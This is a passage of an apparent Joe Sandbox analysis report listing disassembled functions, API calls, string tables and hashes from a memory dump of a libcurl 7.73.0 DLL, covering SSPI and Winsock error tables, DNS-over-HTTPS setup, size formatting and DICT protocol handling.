                                                                                                                                  • Opcode ID: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                                  • Instruction ID: eacbff0118ebfb86a46a186b0a175d72cb7ea2e05c2d1e4679e19bb0ae1af54d
                                                                                                                                  • Opcode Fuzzy Hash: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                                  • Instruction Fuzzy Hash: EBE08C72911238EBCB10DB99C940A9AF3ECEB45B08B154496F511D3110D274DE00CBD0
                                                                                                                                  Function 6B909A80 Relevance: 161.3, APIs: 7, Strings: 85, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(6B908609,00000000,6B907A04), ref: 6B909A9F
                                                                                                                                  Strings
                                                                                                                                  • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6B909E88
                                                                                                                                  • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6B909C44
                                                                                                                                  • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6B909BAE
                                                                                                                                  • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6B909E3E
                                                                                                                                  • SEC_E_LOGON_DENIED, xrefs: 6B909C3A
                                                                                                                                  • CRYPT_E_REVOKED, xrefs: 6B909DB6
                                                                                                                                  • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6B909D7A
                                                                                                                                  • Unknown error, xrefs: 6B909E76
                                                                                                                                  • SEC_E_INVALID_PARAMETER, xrefs: 6B909BE0
                                                                                                                                  • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6B909CD0
                                                                                                                                  • SEC_I_LOCAL_LOGON, xrefs: 6B909E5A
                                                                                                                                  • SEC_E_NO_CREDENTIALS, xrefs: 6B909C80
                                                                                                                                  • SEC_E_CONTEXT_EXPIRED, xrefs: 6B909B54
                                                                                                                                  • SEC_E_NO_IMPERSONATION, xrefs: 6B909C8A
                                                                                                                                  • SEC_E_BAD_PKGID, xrefs: 6B909B0E
                                                                                                                                  • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6B909CDA
                                                                                                                                  • SEC_I_NO_LSA_CONTEXT, xrefs: 6B909E61
                                                                                                                                  • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6B909D8E
                                                                                                                                  • SEC_E_KDC_INVALID_REQUEST, xrefs: 6B909C1C
                                                                                                                                  • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6B909B68
                                                                                                                                  • SEC_E_TIME_SKEW, xrefs: 6B909D5C
                                                                                                                                  • SEC_E_ILLEGAL_MESSAGE, xrefs: 6B909BA4
                                                                                                                                  • SEC_E_DELEGATION_REQUIRED, xrefs: 6B909B86
                                                                                                                                  • SEC_E_MUST_BE_KDC, xrefs: 6B909C62
                                                                                                                                  • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6B909D84
                                                                                                                                  • %s (0x%08X), xrefs: 6B909DBD
                                                                                                                                  • SEC_I_CONTINUE_NEEDED, xrefs: 6B909DBC, 6B909E1E
                                                                                                                                  • SEC_E_INTERNAL_ERROR, xrefs: 6B909BCC
                                                                                                                                  • SEC_E_NO_IP_ADDRESSES, xrefs: 6B909C94
                                                                                                                                  • SEC_E_CERT_EXPIRED, xrefs: 6B909B36
                                                                                                                                  • SEC_I_RENEGOTIATE, xrefs: 6B909E68
                                                                                                                                  • SEC_E_SECPKG_NOT_FOUND, xrefs: 6B909D0C
                                                                                                                                  • SEC_E_POLICY_NLTM_ONLY, xrefs: 6B909CE4
                                                                                                                                  • SEC_E_CANNOT_INSTALL, xrefs: 6B909B22
                                                                                                                                  • SEC_E_CANNOT_PACK, xrefs: 6B909B2C
                                                                                                                                  • SEC_E_NO_PA_DATA, xrefs: 6B909CA8
                                                                                                                                  • SEC_I_SIGNATURE_NEEDED, xrefs: 6B909E6F
                                                                                                                                  • SEC_E_ENCRYPT_FAILURE, xrefs: 6B909B9A
                                                                                                                                  • SEC_E_INCOMPLETE_MESSAGE, xrefs: 6B909BB8
                                                                                                                                  • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6B909D02
                                                                                                                                  • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6B909C76
                                                                                                                                  • SEC_E_KDC_CERT_REVOKED, xrefs: 6B909C12
                                                                                                                                  • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6B909D20
                                                                                                                                  • SEC_E_QOP_NOT_SUPPORTED, xrefs: 6B909CEE
                                                                                                                                  • SEC_E_NO_TGT_REPLY, xrefs: 6B909CBC
                                                                                                                                  • SEC_E_INVALID_TOKEN, xrefs: 6B909BEA
                                                                                                                                  • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6B909CB2
                                                                                                                                  • SEC_E_DELEGATION_POLICY, xrefs: 6B909B7C
                                                                                                                                  • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6B909BF4
                                                                                                                                  • SEC_E_DOWNGRADE_DETECTED, xrefs: 6B909B90
                                                                                                                                  • SEC_E_BUFFER_TOO_SMALL, xrefs: 6B909B18
                                                                                                                                  • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6B909D3E
                                                                                                                                  • SEC_E_UNTRUSTED_ROOT, xrefs: 6B909D98
                                                                                                                                  • SEC_E_MESSAGE_ALTERED, xrefs: 6B909C4E
                                                                                                                                  • SEC_E_DECRYPT_FAILURE, xrefs: 6B909B72
                                                                                                                                  • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6B909B5E
                                                                                                                                  • SEC_E_WRONG_PRINCIPAL, xrefs: 6B909DAC
                                                                                                                                  • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6B909D48
                                                                                                                                  • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6B909D34
                                                                                                                                  • SEC_E_OUT_OF_SEQUENCE, xrefs: 6B909CC6
                                                                                                                                  • SEC_E_REVOCATION_OFFLINE_C, xrefs: 6B909CF8
                                                                                                                                  • SEC_E_KDC_CERT_EXPIRED, xrefs: 6B909C08
                                                                                                                                  • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6B909D70
                                                                                                                                  • SEC_E_BAD_BINDINGS, xrefs: 6B909B04
                                                                                                                                  • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6B909C30
                                                                                                                                  • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6B909E53
                                                                                                                                  • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6B909D66
                                                                                                                                  • SEC_E_ALGORITHM_MISMATCH, xrefs: 6B909AFA
                                                                                                                                  • SEC_E_SECURITY_QOS_FAILED, xrefs: 6B909D16
                                                                                                                                  • SEC_E_INSUFFICIENT_MEMORY, xrefs: 6B909BC2
                                                                                                                                  • No error, xrefs: 6B909E17
                                                                                                                                  • SEC_E_CERT_WRONG_USAGE, xrefs: 6B909B4A
                                                                                                                                  • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6B909BFE
                                                                                                                                  • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6B909D2A
                                                                                                                                  • SEC_E_NOT_OWNER, xrefs: 6B909C6C
                                                                                                                                  • SEC_E_INVALID_HANDLE, xrefs: 6B909BD6
                                                                                                                                  • SEC_E_CERT_UNKNOWN, xrefs: 6B909B40
                                                                                                                                  • %s - %s, xrefs: 6B909DF5
                                                                                                                                  • SEC_E_NO_KERB_KEY, xrefs: 6B909C9E
                                                                                                                                  • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6B909C58
                                                                                                                                  • SEC_I_CONTEXT_EXPIRED, xrefs: 6B909E4C
                                                                                                                                  • SEC_I_COMPLETE_NEEDED, xrefs: 6B909E45
                                                                                                                                  • SEC_E_TARGET_UNKNOWN, xrefs: 6B909D52
                                                                                                                                  • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6B909DA2
                                                                                                                                  • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6B909C26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                                  • API String ID: 1452528299-1081713384
                                                                                                                                  • Opcode ID: 772960577e68770a60bca4e3e0d4e7740d36e80d2a2d9fc132b6bff11e158855
                                                                                                                                  • Instruction ID: 308f1b973f3bf22c0edf77f07b8ad0e96bb7aab4fec0aab8ec552aeb233dd328
                                                                                                                                  • Opcode Fuzzy Hash: 772960577e68770a60bca4e3e0d4e7740d36e80d2a2d9fc132b6bff11e158855
                                                                                                                                  • Instruction Fuzzy Hash: 5791122069CB04D7C634857C85C8595FA6A6B27BC4B58C27EF903CF22ADE2DCD864763
                                                                                                                                  Function 6B90A820 Relevance: 89.4, APIs: 1, Strings: 50, Instructions: 139COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strncpy
                                                                                                                                  • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                                  • API String ID: 2961919466-3442644082
                                                                                                                                  • Opcode ID: 4eb470a7f1c6b614eac145c0da6536eab89a7528e2a97f0fd43bf8e0cfa3303e
                                                                                                                                  • Instruction ID: b2fb743b82b983767d7545fde1e4a2e3f0af2df4c5d5fb7383cf1eff8049fba6
                                                                                                                                  • Opcode Fuzzy Hash: 4eb470a7f1c6b614eac145c0da6536eab89a7528e2a97f0fd43bf8e0cfa3303e
                                                                                                                                  • Instruction Fuzzy Hash: A44150222A8309AB8134096D5B106573647BB53B90B83C6BEB804CE3D2E87EC84773D7
                                                                                                                                  Function 6B8FE610 Relevance: 61.7, APIs: 33, Strings: 2, Instructions: 499COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8FE683
                                                                                                                                  • curl_maprintf.LIBCURL(%s?dns=%s,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 6B8FE753
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002712,00000000,?,?,?,?,00000000,?,?,?), ref: 6B8FE806
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00004E2B,6B8FE5E0,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6B8FE825
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002711,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6B8FE849
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000271F,?), ref: 6B8FE86F
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000003C,?), ref: 6B8FE88C
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002727,?), ref: 6B8FE8A9
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000B5,00000002), ref: 6B8FE8C5
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000009B,?), ref: 6B8FE8E2
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000029,00000001), ref: 6B8FE903
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000063,00000001), ref: 6B8FE925
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000E9,00000001), ref: 6B8FE94A
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000051,00000002), ref: 6B8FE96C
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000F9,00000002), ref: 6B8FE991
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000F8,00000001), ref: 6B8FE9B6
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002806,?), ref: 6B8FE9DB
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002814,?), ref: 6B8FEA00
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000105,00000008), ref: 6B8FEA32
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002807,?), ref: 6B8FEA57
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000040,00000001), ref: 6B8FEA79
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000E8,00000001), ref: 6B8FEA9E
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002751,?), ref: 6B8FEAC3
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002771,?), ref: 6B8FEAE8
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000027B9,?), ref: 6B8FEB0D
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000AC,00000001), ref: 6B8FEB32
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000275C,?), ref: 6B8FEB57
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000275D,?), ref: 6B8FEB7C
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000D8,00000008), ref: 6B8FEBAE
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00004E8C,?), ref: 6B8FEBD3
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000277D,?), ref: 6B8FEBF8
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000283A,?), ref: 6B8FEC1D
                                                                                                                                  • curl_multi_add_handle.LIBCURL(?,00000000), ref: 6B8FEC4E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_setopt$___from_strstr_to_strchrcurl_maprintfcurl_multi_add_handle
                                                                                                                                  • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                                                                                                                  • API String ID: 667061265-3030351490
                                                                                                                                  • Opcode ID: 07eb24440078b084f2de04d950d306fedbe7f4ff481d4b0622cb8226704b0d6c
                                                                                                                                  • Instruction ID: c273999a6a016736d116d131eb06165d353f07298013bda61541d265ecf42a0e
                                                                                                                                  • Opcode Fuzzy Hash: 07eb24440078b084f2de04d950d306fedbe7f4ff481d4b0622cb8226704b0d6c
                                                                                                                                  • Instruction Fuzzy Hash: D9F14A71E44215FBEF228A70CC42B8A7BA9AF107D5F0406E4EC54BB291D7AE8E51C7D0
                                                                                                                                  Function 6B8FD000 Relevance: 47.5, APIs: 19, Strings: 8, Instructions: 204COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%5I64d,?,?,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD02A
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD053
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dk,00000000,?,?,?,00000400,00000000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD065
                                                                                                                                  • __allrem.LIBCMT ref: 6B8FD08A
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD098
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD0A8
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dM,00000000,?,?,?,00100000,00000000,00000000,?,00000000,?,00019999,00000000,?), ref: 6B8FD0BA
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD0E0
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dM,00000000,?,?,?,00100000,00000000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD0F2
                                                                                                                                  • __allrem.LIBCMT ref: 6B8FD114
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD122
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD132
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dG,00000000,?,?,?,40000000,00000000,00000000,?,00000000,?,06666666,00000000,?), ref: 6B8FD144
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD169
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dG,00000000,?,?,?,40000000,00000000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD17B
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD1A0
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dT,00000000,?,?,?,00000000,00000100,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD1B2
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD1C9
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dP,00000000,?,?,?,00000000,00040000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD1DB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
                                                                                                                                  • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                                  • API String ID: 3299120379-2102732564
                                                                                                                                  • Opcode ID: fecdbff301afe0f417d7a72c2a5059cca32ac20230e01523ae4d18eff57ea1fc
                                                                                                                                  • Instruction ID: eea98cfa0bff0f25150174a6b85636068042e8138635dd91d52410380b3798c9
                                                                                                                                  • Opcode Fuzzy Hash: fecdbff301afe0f417d7a72c2a5059cca32ac20230e01523ae4d18eff57ea1fc
                                                                                                                                  • Instruction Fuzzy Hash: D641C6A7FC066436E63059682C12FAF631CDBD2F99F154869FB09BB181935CA81343F9
                                                                                                                                  Function 6B8D9190 Relevance: 35.3, APIs: 8, Strings: 12, Instructions: 277COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D9245
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D92AB
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D92BD
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D92D1
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D9364
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D9376
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D938A
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D939F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.73.0%sQUIT$CLIENT libcurl 7.73.0DEFINE %s %sQUIT$CLIENT libcurl 7.73.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                                                                                                                  • API String ID: 601868998-3098048912
                                                                                                                                  • Opcode ID: f9243aa8a47698230e88e5d0091c09f786b409458dd647097b8da1df6ec4b4f1
                                                                                                                                  • Instruction ID: 105db3ab285a21ad8e5ab69fbf44a551d7bd71b5528beb1e0dc0b691208536cc
                                                                                                                                  • Opcode Fuzzy Hash: f9243aa8a47698230e88e5d0091c09f786b409458dd647097b8da1df6ec4b4f1
                                                                                                                                  • Instruction Fuzzy Hash: 00714B22E0461967D7110A795C52B6E7B798FE276DF1405EAEC586B283FB3EC90083F1
                                                                                                                                  Function 6B8F2B70 Relevance: 33.5, APIs: 2, Strings: 17, Instructions: 282COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,00000000,?,?,multipart/form-data), ref: 6B8F2B8F
                                                                                                                                  • curl_strequal.LIBCURL(?,attachment,?,?,?,multipart/form-data), ref: 6B8F2CCC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_allcurl_strequal
